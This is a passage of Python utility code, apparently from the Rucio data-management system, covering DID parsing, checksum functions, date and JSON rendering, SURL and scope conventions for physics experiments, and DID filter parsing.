406: '406 Not Acceptable',
408: '408 Request Timeout',
409: '409 Conflict',
410: '410 Gone',
# Server Error.
500: '500 Internal Server Error',
501: '501 Not Implemented',
502: '502 Bad Gateway',
503: '503 Service Unavailable',
504: '504 Gateway Timeout'
}
# RFC 1123 (ex RFC 822)
DATE_FORMAT = '%a, %d %b %Y %H:%M:%S UTC'
def dids_as_dicts(did_list):
"""
Converts list of DIDs to list of dictionaries
:param did_list: list of DIDs as either "scope:name" or {"scope":"scope", "name","name"}
:returns: list of dictionaries {"scope":"scope", "name","name"}
"""
out = []
for did in did_list:
if isinstance(did, str):
scope, name = did.split(":", 1)
did = dict(scope=scope, name=name)
if isinstance(did, dict):
if not ("name" in did and "scope" in did):
raise ValueError("Scope or name missing in: %s" % (did,))
else:
raise ValueError("Can not convert item %s (%s) to a DID" % (did, type(did)))
out.append(did)
return out
def build_url(url, path=None, params=None, doseq=False):
"""
utitily function to build an url for requests to the rucio system.
If the optional parameter doseq is evaluates to True, individual key=value pairs
separated by '&' are generated for each element of the value sequence for the key.
"""
complete_url = url
if path is not None:
complete_url += "/" + path
if params is not None:
complete_url += "?"
if isinstance(params, str):
complete_url += quote(params)
else:
complete_url += urlencode(params, doseq=doseq)
return complete_url
def all_oidc_req_claims_present(scope, audience, required_scope, required_audience, sepatator=" "):
"""
Checks if both of the following statements are true:
- all items in required_scope are present in scope string
- all items in required_audience are present in audience
returns false otherwise. audience and scope must be both strings
or both lists. Similarly for required_* variables.
If this condition is satisfied, False is returned.
:params scope: list of strings or one string where items are separated by a separator input variable
:params audience: list of strings or one string where items are separated by a separator input variable
:params required_scope: list of strings or one string where items are separated by a separator input variable
:params required_audience: list of strings or one string where items are separated by a separator input variable
:params sepatator: separator string, space by default
:returns : True or False
"""
if not scope:
scope = ""
if not audience:
audience = ""
if not required_scope:
required_scope = ""
if not required_audience:
required_audience = ""
if (isinstance(scope, list) and isinstance(audience, list) and isinstance(required_scope, list) and isinstance(required_audience, list)):
scope = [str(it) for it in scope]
audience = [str(it) for it in audience]
required_scope = [str(it) for it in required_scope]
required_audience = [str(it) for it in required_audience]
req_scope_present = all(elem in scope for elem in required_scope)
req_audience_present = all(elem in audience for elem in required_audience)
return req_scope_present and req_audience_present
elif (isinstance(scope, string_types) and isinstance(audience, string_types) and isinstance(required_scope, string_types) and isinstance(required_audience, string_types)):
scope = str(scope)
audience = str(audience)
required_scope = str(required_scope)
required_audience = str(required_audience)
req_scope_present = all(elem in scope.split(sepatator) for elem in required_scope.split(sepatator))
req_audience_present = all(elem in audience.split(sepatator) for elem in required_audience.split(sepatator))
return req_scope_present and req_audience_present
elif (isinstance(scope, list) and isinstance(audience, list) and isinstance(required_scope, string_types) and isinstance(required_audience, string_types)):
scope = [str(it) for it in scope]
audience = [str(it) for it in audience]
required_scope = str(required_scope)
required_audience = str(required_audience)
req_scope_present = all(elem in scope for elem in required_scope.split(sepatator))
req_audience_present = all(elem in audience for elem in required_audience.split(sepatator))
return req_scope_present and req_audience_present
elif (isinstance(scope, string_types) and isinstance(audience, string_types) and isinstance(required_scope, list) and isinstance(required_audience, list)):
scope = str(scope)
audience = str(audience)
required_scope = [str(it) for it in required_scope]
required_audience = [str(it) for it in required_audience]
req_scope_present = all(elem in scope.split(sepatator) for elem in required_scope)
req_audience_present = all(elem in audience.split(sepatator) for elem in required_audience)
return req_scope_present and req_audience_present
else:
return False
def generate_uuid():
return str(uuid()).replace('-', '').lower()
def generate_uuid_bytes():
return uuid().bytes
# GLOBALLY_SUPPORTED_CHECKSUMS = ['adler32', 'md5', 'sha256', 'crc32']
GLOBALLY_SUPPORTED_CHECKSUMS = ['adler32', 'md5']
CHECKSUM_ALGO_DICT = {}
PREFERRED_CHECKSUM = GLOBALLY_SUPPORTED_CHECKSUMS[0]
CHECKSUM_KEY = 'supported_checksums'
def is_checksum_valid(checksum_name):
"""
A simple function to check wether a checksum algorithm is supported.
Relies on GLOBALLY_SUPPORTED_CHECKSUMS to allow for expandability.
:param checksum_name: The name of the checksum to be verified.
:returns: True if checksum_name is in GLOBALLY_SUPPORTED_CHECKSUMS list, False otherwise.
"""
return checksum_name in GLOBALLY_SUPPORTED_CHECKSUMS
def set_preferred_checksum(checksum_name):
"""
A simple function to check wether a checksum algorithm is supported.
Relies on GLOBALLY_SUPPORTED_CHECKSUMS to allow for expandability.
:param checksum_name: The name of the checksum to be verified.
:returns: True if checksum_name is in GLOBALLY_SUPPORTED_CHECKSUMS list, False otherwise.
"""
if is_checksum_valid(checksum_name):
global PREFERRED_CHECKSUM
PREFERRED_CHECKSUM = checksum_name
def set_checksum_value(file, checksum_names_list):
for checksum_name in checksum_names_list:
if checksum_name in file['metadata'].keys() and file['metadata'][checksum_name]:
file['checksum'] = '%s:%s' % (checksum_name.upper(), str(file['metadata'][checksum_name]))
if checksum_name == PREFERRED_CHECKSUM:
break
def adler32(file):
"""
An Adler-32 checksum is obtained by calculating two 16-bit checksums A and B
and concatenating their bits into a 32-bit integer. A is the sum of all bytes in the
stream plus one, and B is the sum of the individual values of A from each step.
:param file: file name
:returns: Hexified string, padded to 8 values.
"""
# adler starting value is _not_ 0
adler = 1
can_mmap = False
try:
with open(file, 'r+b') as f:
can_mmap = True
except:
pass
try:
# use mmap if possible
if can_mmap:
with open(file, 'r+b') as f:
m = mmap.mmap(f.fileno(), 0)
# partial block reads at slightly increased buffer sizes
for block in iter(partial(m.read, io.DEFAULT_BUFFER_SIZE * 8), b''):
adler = zlib.adler32(block, adler)
else:
with open(file, 'rb') as f:
# partial block reads at slightly increased buffer sizes
for block in iter(partial(f.read, io.DEFAULT_BUFFER_SIZE * 8), b''):
adler = zlib.adler32(block, adler)
except Exception as e:
raise Exception('FATAL - could not get Adler-32 checksum of file %s: %s' % (file, e))
# backflip on 32bit -- can be removed once everything is fully migrated to 64bit
if adler < 0:
adler = adler + 2 ** 32
return str('%08x' % adler)
CHECKSUM_ALGO_DICT['adler32'] = adler32
def md5(file):
"""
Runs the MD5 algorithm (RFC-1321) on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 32 hexadecimal digits
"""
hash_md5 = hashlib.md5()
try:
with open(file, "rb") as f:
list(map(hash_md5.update, iter(lambda: f.read(4096), b"")))
except Exception as e:
raise Exception('FATAL - could not get MD5 checksum of file %s - %s' % (file, e))
return hash_md5.hexdigest()
CHECKSUM_ALGO_DICT['md5'] = md5
def sha256(file):
"""
Runs the SHA256 algorithm on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 32 hexadecimal digits
"""
with open(file, "rb") as f:
bytes_ = f.read() # read entire file as bytes
readable_hash = hashlib.sha256(bytes_).hexdigest()
print(readable_hash)
return readable_hash
CHECKSUM_ALGO_DICT['sha256'] = sha256
def crc32(file):
"""
Runs the CRC32 algorithm on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 32 hexadecimal digits
"""
prev = 0
for eachLine in open(file, "rb"):
prev = zlib.crc32(eachLine, prev)
return "%X" % (prev & 0xFFFFFFFF)
CHECKSUM_ALGO_DICT['crc32'] = crc32
def str_to_date(string):
""" Converts a RFC-1123 string to the corresponding datetime value.
:param string: the RFC-1123 string to convert to datetime value.
"""
return datetime.datetime.strptime(string, DATE_FORMAT) if string else None
def val_to_space_sep_str(vallist):
""" Converts a list of values into a string of space separated values
:param vallist: the list of values to to convert into string
:return: the string of space separated values or the value initially passed as parameter
"""
try:
if isinstance(vallist, list):
return text_type(" ".join(vallist))
else:
return text_type(vallist)
except:
return text_type('')
def date_to_str(date):
""" Converts a datetime value to the corresponding RFC-1123 string.
:param date: the datetime value to convert.
"""
return datetime.datetime.strftime(date, DATE_FORMAT) if date else None
class APIEncoder(json.JSONEncoder):
""" Propretary JSONEconder subclass used by the json render function.
This is needed to address the encoding of special values.
"""
def default(self, obj): # pylint: disable=E0202
if isinstance(obj, datetime.datetime):
# convert any datetime to RFC 1123 format
return date_to_str(obj)
elif isinstance(obj, (datetime.time, datetime.date)):
# should not happen since the only supported date-like format
# supported at dmain schema level is 'datetime' .
return obj.isoformat()
elif isinstance(obj, datetime.timedelta):
return obj.days * 24 * 60 * 60 + obj.seconds
elif isinstance(obj, Enum):
return obj.name
elif isinstance(obj, (InternalAccount, InternalScope)):
return obj.external
return json.JSONEncoder.default(self, obj)
def render_json(**data):
""" JSON render function
"""
return json.dumps(data, cls=APIEncoder)
def render_json_list(list_):
""" JSON render function for list
"""
return json.dumps(list_, cls=APIEncoder)
def datetime_parser(dct):
""" datetime parser
"""
for k, v in list(dct.items()):
if isinstance(v, string_types) and re.search(" UTC", v):
try:
dct[k] = datetime.datetime.strptime(v, DATE_FORMAT)
except Exception:
pass
return dct
def parse_response(data):
"""
JSON render function
"""
if hasattr(data, 'decode'):
data = data.decode('utf-8')
return json.loads(data, object_hook=datetime_parser)
def execute(cmd, blocking=True):
"""
Executes a command in a subprocess. Returns a tuple
of (exitcode, out, err), where out is the string output
from stdout and err is the string output from stderr when
executing the command.
:param cmd: Command string to execute
"""
process = subprocess.Popen(cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if blocking:
result = process.communicate()
(out, err) = result
exitcode = process.returncode
return exitcode, out.decode(encoding='utf-8'), err.decode(encoding='utf-8')
return process
def rse_supported_protocol_operations():
""" Returns a list with operations supported by all RSE protocols."""
return ['read', 'write', 'delete', 'third_party_copy', 'third_party_copy_read', 'third_party_copy_write']
def rse_supported_protocol_domains():
""" Returns a list with all supoorted RSE protocol domains."""
return ['lan', 'wan']
def grouper(iterable, n, fillvalue=None):
""" Collect data into fixed-length chunks or blocks """
# grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
args = [iter(iterable)] * n
return izip_longest(*args, fillvalue=fillvalue)
def chunks(iterable, n):
"""
Yield successive n-sized chunks from l.
"""
if isinstance(iterable, list):
for i in range(0, len(iterable), n):
yield iterable[i:i + n]
else:
it = iter(iterable)
while True:
chunk = list(itertools.islice(it, n))
if not chunk:
return
yield chunk
def dict_chunks(dict_, n):
"""
Iterate over the dictionary in groups of the requested size
"""
it = iter(dict_)
for _ in range(0, len(dict_), n):
yield {k: dict_[k] for k in itertools.islice(it, n)}
def my_key_generator(namespace, fn, **kw):
"""
Customyzed key generator for dogpile
"""
fname = fn.__name__
def generate_key(*arg, **kw):
return namespace + "_" + fname + "_".join(str(s) for s in filter(None, arg))
return generate_key
def construct_surl_DQ2(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains DQ2 convention. To be used for non-deterministic sites.
Method imported from DQ2.
@return: relative SURL for new replica.
@rtype: str
"""
# check how many dots in dsn
fields = dsn.split('.')
nfields = len(fields)
if nfields == 0:
return '/other/other/%s' % (filename)
elif nfields == 1:
stripped_dsn = __strip_dsn(dsn)
return '/other/%s/%s' % (stripped_dsn, filename)
elif nfields == 2:
project = fields[0]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s' % (project, stripped_dsn, filename)
elif nfields < 5 or re.match('user*|group*', fields[0]):
project = fields[0]
f2 = fields[1]
f3 = fields[2]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, f2, f3, stripped_dsn, filename)
else:
project = fields[0]
dataset_type = fields[4]
if nfields == 5:
tag = 'other'
else:
tag = __strip_tag(fields[-1])
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, dataset_type, tag, stripped_dsn, filename)
def construct_surl_T0(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains Tier0 convention. To be used for non-deterministic sites.
@return: relative SURL for new replica.
@rtype: str
"""
fields = dsn.split('.')
nfields = len(fields)
if nfields >= 3:
return '/%s/%s/%s/%s/%s' % (fields[0], fields[2], fields[1], dsn, filename)
elif nfields == 1:
return '/%s/%s/%s/%s/%s' % (fields[0], 'other', 'other', dsn, filename)
elif nfields == 2:
return '/%s/%s/%s/%s/%s' % (fields[0], fields[2], 'other', dsn, filename)
elif nfields == 0:
return '/other/other/other/other/%s' % (filename)
def construct_surl_BelleII(dsn, filename):
"""
Defines relative SURL for Belle II specific replicas.
This method contains the Belle II convention.
To be used for non-deterministic Belle II sites.
DSN (or datablock in the Belle II naming) contains /
"""
fields = dsn.split("/")
nfields = len(fields)
if nfields == 0:
return '/other/%s' % (filename)
else:
return '%s/%s' % (dsn, filename)
_SURL_ALGORITHMS = {}
_DEFAULT_SURL = 'DQ2'
_loaded_policy_modules = False
def register_surl_algorithm(surl_callable, name=None):
if name is None:
name = surl_callable.__name__
_SURL_ALGORITHMS[name] = surl_callable
register_surl_algorithm(construct_surl_T0, 'T0')
register_surl_algorithm(construct_surl_DQ2, 'DQ2')
register_surl_algorithm(construct_surl_BelleII, 'BelleII')
def construct_surl(dsn, filename, naming_convention=None):
global _loaded_policy_modules
if not _loaded_policy_modules:
# on first call, register any SURL functions from the policy packages
register_policy_package_algorithms('surl', _SURL_ALGORITHMS)
_loaded_policy_modules = True
if naming_convention is None or naming_convention not in _SURL_ALGORITHMS:
naming_convention = _DEFAULT_SURL
return _SURL_ALGORITHMS[naming_convention](dsn, filename)
def __strip_dsn(dsn):
"""
Drop the _sub and _dis suffixes for panda datasets from the lfc path
they will be registered in.
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_frag']
fields = dsn.split('.')
last_field = fields[-1]
try:
for suffix in suffixes_to_drop:
last_field = re.sub('%s.*$' % suffix, '', last_field)
except IndexError:
return dsn
fields[-1] = last_field
stripped_dsn = '.'.join(fields)
return stripped_dsn
def __strip_tag(tag):
"""
Drop the _sub and _dis suffixes for panda datasets from the lfc path
they will be registered in
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_tid']
stripped_tag = tag
try:
for suffix in suffixes_to_drop:
stripped_tag = re.sub('%s.*$' % suffix, '', stripped_tag)
except IndexError:
return stripped_tag
return stripped_tag
def clean_surls(surls):
res = []
for surl in surls:
if surl.startswith('srm'):
surl = re.sub(':[0-9]+/', '/', surl)
surl = re.sub(r'/srm/managerv1\?SFN=', '', surl)
surl = re.sub(r'/srm/v2/server\?SFN=', '', surl)
surl = re.sub(r'/srm/managerv2\?SFN=', '', surl)
if '?GoogleAccessId' in surl:
surl = surl.split('?GoogleAccessId')[0]
if '?X-Amz' in surl:
surl = surl.split('?X-Amz')[0]
res.append(surl)
res.sort()
return res
_EXTRACT_SCOPE_ALGORITHMS = {}
_DEFAULT_EXTRACT = 'atlas'
_loaded_policy_package_scope_algorithms = False
def extract_scope_atlas(did, scopes):
# Try to extract the scope from the DSN
if did.find(':') > -1:
if len(did.split(':')) > 2:
raise RucioException('Too many colons. Cannot extract scope and name')
scope, name = did.split(':')[0], did.split(':')[1]
if name.endswith('/'):
name = name[:-1]
return scope, name
else:
scope = did.split('.')[0]
if did.startswith('user') or did.startswith('group'):
scope = ".".join(did.split('.')[0:2])
if did.endswith('/'):
did = did[:-1]
return scope, did
def extract_scope_dirac(did, scopes):
# Default dirac scope extract algorithm. Scope is the second element in the LFN or the first one (VO name)
# if only one element is the result of a split.
elem = did.rstrip('/').split('/')
if len(elem) > 2:
scope = elem[2]
else:
scope = elem[1]
return scope, did
def extract_scope_belleii(did, scopes):
split_did = did.split('/')
if did.startswith('/belle/MC/'):
if did.startswith('/belle/MC/BG') or \
did.startswith('/belle/MC/build') or \
did.startswith('/belle/MC/generic') or \
did.startswith('/belle/MC/log') or \
did.startswith('/belle/MC/mcprod') or \
did.startswith('/belle/MC/prerelease') or \
did.startswith('/belle/MC/release'):
return 'mc', did
if did.startswith('/belle/MC/cert') or \
did.startswith('/belle/MC/dirac') or \
did.startswith('/belle/MC/dr3') or \
did.startswith('/belle/MC/fab') or \
did.startswith('/belle/MC/hideki') or \
did.startswith('/belle/MC/merge') or \
did.startswith('/belle/MC/migration') or \
did.startswith('/belle/MC/skim') or \
did.startswith('/belle/MC/test'):
return 'mc_tmp', did
if len(split_did) > 4:
if split_did[3].find('fab') > -1 or split_did[3].find('merge') > -1 or split_did[3].find('skim') > -1:
return 'mc_tmp', did
if split_did[3].find('release') > -1:
return 'mc', did
return 'mc_tmp', did
if did.startswith('/belle/Raw/'):
return 'raw', did
if did.startswith('/belle/hRaw'):
return 'hraw', did
if did.startswith('/belle/user/'):
if len(split_did) > 4:
if len(split_did[3]) == 1 and 'user.%s' % (split_did[4]) in scopes:
return 'user.%s' % split_did[4], did
if len(split_did) > 3:
if 'user.%s' % (split_did[3]) in scopes:
return 'user.%s' % split_did[3], did
return 'user', did
if did.startswith('/belle/group/'):
if len(split_did) > 4:
if 'group.%s' % (split_did[4]) in scopes:
return 'group.%s' % split_did[4], did
return 'group', did
if did.startswith('/belle/data/') or did.startswith('/belle/Data/'):
if len(split_did) > 4:
if split_did[3] in ['fab', 'skim']: # /belle/Data/fab --> data_tmp
return 'data_tmp', did
if split_did[3].find('release') > -1: # /belle/Data/release --> data
return 'data', did
if len(split_did) > 5:
if split_did[3] in ['proc']: # /belle/Data/proc
if split_did[4].find('release') > -1: # /belle/Data/proc/release*
if len(split_did) > 7 and split_did[6] in ['GCR2c', 'prod00000007', 'prod6b', 'proc7b',
'proc8b', 'Bucket4', 'Bucket6test', 'bucket6',
'proc9', 'bucket7', 'SKIMDATAx1', 'proc10Valid',
'proc10', 'SkimP10x1', 'SkimP11x1', 'SkimB9x1',
'SkimB10x1', 'SkimB11x1']: # /belle/Data/proc/release*/*/proc10/* --> data_tmp (Old convention)
return 'data_tmp', did
else: # /belle/Data/proc/release*/*/proc11/* --> data (New convention)
return 'data', did
if split_did[4].find('fab') > -1: # /belle/Data/proc/fab* --> data_tmp
return 'data_tmp', did
return 'data_tmp', did
if did.startswith('/belle/ddm/functional_tests/') or did.startswith('/belle/ddm/tests/') or did.startswith('/belle/test/ddm_test'):
return 'test', did
if did.startswith('/belle/BG/'):
return 'data', did
if did.startswith('/belle/collection'):
return 'collection', did
return 'other', did
def register_extract_scope_algorithm(extract_callable, name=[]):
if name is None:
name = extract_callable.__name__
_EXTRACT_SCOPE_ALGORITHMS[name] = extract_callable
register_extract_scope_algorithm(extract_scope_atlas, 'atlas')
register_extract_scope_algorithm(extract_scope_belleii, 'belleii')
register_extract_scope_algorithm(extract_scope_dirac, 'dirac')
def extract_scope(did, scopes=None, default_extract=_DEFAULT_EXTRACT):
global _loaded_policy_package_scope_algorithms
if not _loaded_policy_package_scope_algorithms:
register_policy_package_algorithms('scope', _EXTRACT_SCOPE_ALGORITHMS)
_loaded_policy_package_scope_algorithms = True
extract_scope_convention = config_get('common', 'extract_scope', False, None)
if extract_scope_convention is None or extract_scope_convention not in _EXTRACT_SCOPE_ALGORITHMS:
extract_scope_convention = default_extract
return _EXTRACT_SCOPE_ALGORITHMS[extract_scope_convention](did=did, scopes=scopes)
def pid_exists(pid):
"""
Check whether pid exists in the current process table.
UNIX only.
"""
if pid < 0:
return False
if pid == 0:
# According to "man 2 kill" PID 0 refers to every process
# in the process group of the calling process.
# On certain systems 0 is a valid PID but we have no way
# to know that in a portable fashion.
raise ValueError('invalid PID 0')
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
# ESRCH == No such process
return False
elif err.errno == errno.EPERM:
# EPERM clearly means there's a process to deny access to
return True
else:
# According to "man 2 kill" possible error values are
# (EINVAL, EPERM, ESRCH)
raise
else:
return True
def sizefmt(num, human=True):
"""
Print human readable file sizes
"""
if num is None:
return '0.0 B'
try:
num = int(num)
if human:
for unit in ['', 'k', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1000.0:
return "%3.3f %sB" % (num, unit)
num /= 1000.0
return "%.1f %sB" % (num, 'Y')
else:
return str(num)
except OverflowError:
return 'Inf'
def get_tmp_dir():
"""
Get a path where to store temporary files.
Rucio searches a standard list of temporary directories. The list is:
The directory named by the TMP environment variable.
The directory named by the TMPDIR environment variable.
The directory named by the TEMP environment variable.
As a last resort, the /tmp/ directory.
:return: A path.
"""
base_dir = os.path.abspath(tempfile.gettempdir())
try:
return os.path.join(base_dir, getpass.getuser())
except Exception:
pass
try:
return os.path.join(base_dir, str(os.getuid()))
except Exception:
pass
return base_dir
def is_archive(name):
'''
Check if a file name is an archive file or not.
:return: A boolean.
'''
regexp = r'^.*\.(zip|zipx|tar.gz|tgz|tar.Z|tar.bz2|tbz2)(\.\d+)*$'
if re.match(regexp, name, re.I):
return True
return False
class Color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
def detect_client_location():
"""
Normally client IP will be set on the server side (request.remote_addr)
Here setting ip on the one seen by the host itself. There is no connection
to Google DNS servers.
Try to determine the sitename automatically from common environment variables,
in this order: SITE_NAME, ATLAS_SITE_NAME, OSG_SITE_NAME. If none of these exist
use the fixed string 'ROAMING'.
If environment variables sets location, it uses it.
"""
ip = None
try:
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect(("2001:4860:4860:0:0:0:0:8888", 80))
ip = s.getsockname()[0]
except Exception:
pass
if not ip:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip = s.getsockname()[0]
except Exception:
pass
if not ip:
ip = '0.0.0.0'
site = os.environ.get('SITE_NAME',
os.environ.get('ATLAS_SITE_NAME',
os.environ.get('OSG_SITE_NAME',
'ROAMING')))
latitude = os.environ.get('RUCIO_LATITUDE')
longitude = os.environ.get('RUCIO_LONGITUDE')
if latitude and longitude:
try:
latitude = float(latitude)
longitude = float(longitude)
except ValueError:
latitude = longitude = 0
print('Client set latitude and longitude are not valid.')
else:
latitude = longitude = None
return {'ip': ip,
'fqdn': socket.getfqdn(),
'site': site,
'latitude': latitude,
'longitude': longitude}
def ssh_sign(private_key, message):
"""
Sign a string message using the private key.
:param private_key: The SSH RSA private key as a string.
:param message: The message to sign as a string.
:return: Base64 encoded signature as a string.
"""
if PY3 and isinstance(message, str):
message = message.encode()
if not EXTRA_MODULES['paramiko']:
raise MissingModuleException('The paramiko module is not installed or faulty.')
sio_private_key = StringIO(private_key)
priv_k = RSAKey.from_private_key(sio_private_key)
sio_private_key.close()
signature_stream = priv_k.sign_ssh_data(message)
signature_stream.rewind()
base64_encoded = base64.b64encode(signature_stream.get_remainder())
if PY3:
base64_encoded = base64_encoded.decode()
return base64_encoded
def make_valid_did(lfn_dict):
"""
When managing information about a LFN (such as in `rucio upload` or
the RSE manager's upload), we add the `filename` attribute to record
the name of the file on the local disk in addition to the remainder
of the DID information.
This function will take that python dictionary, and strip out the
additional `filename` key. If this is not done, then the dictionary
will not pass the DID JSON schema validation.
"""
if 'filename' not in lfn_dict:
return lfn_dict
lfn_copy = dict(lfn_dict)
lfn_copy['name'] = lfn_copy.get('name', lfn_copy['filename'])
del lfn_copy['filename']
return lfn_copy
def send_trace(trace, trace_endpoint, user_agent, retries=5):
"""
Send the given trace to the trace endpoint
:param trace: the trace dictionary to send
:param trace_endpoint: the endpoint where the trace should be send
:param user_agent: the user agent sending the trace
:param retries: the number of retries if sending fails
:return: 0 on success, 1 on failure
"""
if user_agent.startswith('pilot'):
return 0
for dummy in range(retries):
try:
requests.post(trace_endpoint + '/traces/', verify=False, data=json.dumps(trace))
return 0
except Exception:
pass
return 1
def add_url_query(url, query):
"""
Add a new dictionary to URL parameters
:param url: The existing URL
:param query: A dictionary containing key/value pairs to be added to the URL
:return: The expanded URL with the new query parameters
"""
url_parts = list(urlparse(url))
mod_query = dict(parse_qsl(url_parts[4]))
mod_query.update(query)
url_parts[4] = urlencode(mod_query)
return urlunparse(url_parts)
def get_bytes_value_from_string(input_string):
"""
Get bytes from a string that represents a storage value and unit
:param input_string: String containing a value and an unit
:return: Integer value representing the value in bytes
"""
result = re.findall('^([0-9]+)([A-Za-z]+)$', input_string)
if result:
value = int(result[0][0])
unit = result[0][1].lower()
if unit == 'b':
value = value
elif unit == 'kb':
value = value * 1000
elif unit == 'mb':
value = value * 1000000
elif unit == 'gb':
value = value * 1000000000
elif unit == 'tb':
value = value * 1000000000000
elif unit == 'pb':
value = value * 1000000000000000
else:
return False
return value
else:
return False
def parse_did_filter_from_string(input_string):
"""
Parse DID filter options in format 'length<3,type=all' from string.
:param input_string: String containing the filter options.
:return: filter dictionary and type as string.
"""
filters = {}
type_ = 'collection'
if input_string:
filter_options = input_string.replace(' ', '').split(',')
for option in filter_options:
value = None
key = None
if '>=' in option:
key, value = option.split('>=')
if key == 'length':
key = 'length.gte'
elif '>' in option:
key, value = option.split('>')
if key == 'length':
key = 'length.gt'
elif '<=' in option:
key, value = option.split('<=')
if key == 'length':
key = 'length.lte'
elif '<' in option:
key, value = option.split('<')
if key == 'length':
key = 'length.lt'
elif '=' in option:
key, value = option.split('=')
if key == 'created_after' or key == 'created_before':
value = datetime.datetime.strptime(value, '%Y-%m-%dT%H:%M:%S.%fZ')
if key == 'type':
if value.upper() in ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']:
type_ = value.lower()
else:
raise InvalidType('{0} is not a valid type. Valid types are {1}'.format(value, ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']))
elif key in ('length.gt', 'length.lt', 'length.gte', 'length.lte', 'length'):
try:
value = int(value)
filters[key] = value
except ValueError:
raise ValueError('Length has to be an integer value.')
filters[key] = value
elif isinstance(value, string_types):
if value.lower() == 'true':
value = '1'
elif value.lower() == 'false':
value = '0'
filters[key] = value
else:
filters[key] = value
return filters, type_
def parse_did_filter_from_string_fe(input_string, name='*', type='collection', omit_name=False):
"""
Parse DID filter string for the filter engine (fe).
Should adhere to the following conventions:
- ';' represents the logical OR operator
- ',' represents the logical AND operator
- all operators belong to set of (<=, >=, ==, !=, >, <, =)
- there should be no duplicate key+operator criteria.
One sided and compound inequalities are supported.
Sanity checking of input is left to the filter engine.
:param input_string: String containing the filter options.
:param name: DID name.
:param type: The type of the did: all(container, dataset, file), collection(dataset or container), dataset, container.
:param omit_name: omit addition of name to filters.
:return: list of dictionaries with each dictionary as a separate OR expression.
"""
# lookup table unifying all comprehended operators to a nominal suffix.
# note that the order matters as the regex engine is eager, e.g. don't want to evaluate '<=' as '<' and '='.
operators_suffix_LUT = OrderedDict({
'<=': 'lte',
'>=': 'gte',
'==': '',
'!=': 'ne',
'>': 'gt',
'<': 'lt',
'=': ''
})
# lookup table mapping operator opposites, used to reverse compound inequalities.
operator_opposites_LUT = {
'lt': 'gt',
'lte': 'gte'
}
operator_opposites_LUT.update({op2: op1 for op1, op2 in operator_opposites_LUT.items()})
filters = []
if input_string:
or_groups = list(filter(None, input_string.split(';'))) # split <input_string> into OR clauses
for or_group in or_groups:
or_group = or_group.strip()
and_groups = list(filter(None, or_group.split(','))) # split <or_group> into AND clauses
and_group_filters = {}
for and_group in and_groups:
and_group = and_group.strip()
# tokenise this AND clause using operators as delimiters.
tokenisation_regex = "({})".format('|'.join(operators_suffix_LUT.keys()))
and_group_split_by_operator = list(filter(None, re.split(tokenisation_regex, and_group)))
if len(and_group_split_by_operator) == 3: # this is a one-sided inequality or expression
key, operator, value = [token.strip() for token in and_group_split_by_operator]
# substitute input operator with the nominal operator defined by the LUT, <operators_suffix_LUT>.
operator_mapped = operators_suffix_LUT.get(operator)
filter_key_full = key
if operator_mapped is not None:
if operator_mapped:
filter_key_full = "{}.{}".format(key, operator_mapped)
else:
raise DIDFilterSyntaxError("{} operator not understood.".format(operator_mapped))
if filter_key_full in and_group_filters:
raise DuplicateCriteriaInDIDFilter(filter_key_full)
else:
and_group_filters[filter_key_full] = value
elif len(and_group_split_by_operator) == 5: # this is a compound inequality
value1, operator1, key, operator2, value2 = [token.strip() for token in and_group_split_by_operator]
# substitute input operator with the nominal operator defined by the LUT, <operators_suffix_LUT>.
operator1_mapped = operator_opposites_LUT.get(operators_suffix_LUT.get(operator1))
operator2_mapped = operators_suffix_LUT.get(operator2)
filter_key1_full = filter_key2_full = key
if operator1_mapped is not None and operator2_mapped is not None:
if operator1_mapped: # ignore '' operator (maps from equals)
filter_key1_full = "{}.{}".format(key, operator1_mapped)
if operator2_mapped: # ignore '' operator (maps from equals)
filter_key2_full = "{}.{}".format(key, operator2_mapped)
else:
raise DIDFilterSyntaxError("{} operator not understood.".format(operator_mapped))
if filter_key1_full in and_group_filters:
raise DuplicateCriteriaInDIDFilter(filter_key1_full)
else:
and_group_filters[filter_key1_full] = value1
if filter_key2_full in and_group_filters:
raise DuplicateCriteriaInDIDFilter(filter_key2_full)
else:
and_group_filters[filter_key2_full] = value2
else:
raise DIDFilterSyntaxError(and_group)
# add name key to each AND clause if it hasn't already been populated from the filter and <omit_name> not set.
if not omit_name and 'name' not in and_group_filters:
and_group_filters['name'] = name
filters.append(and_group_filters)
else:
if not omit_name:
filters.append({
'name': name
})
return filters, type
def parse_replicas_from_file(path):
"""
Parses the output of list_replicas from a json or metalink file
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param path: the path to the input file
:returns: a list with a dictionary for each file
"""
with open(path) as fp:
try:
root = ElementTree.parse(fp).getroot()
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.load(fp)
except ValueError as json_err:
raise MetalinkJsonParsingError(path, xml_err, json_err)
def parse_replicas_from_string(string):
"""
Parses the output of list_replicas from a json or metalink string
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param string: the string to parse
:returns: a list with a dictionary for each file
"""
try:
root = ElementTree.fromstring(string)
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.loads(string)
except ValueError as json_err:
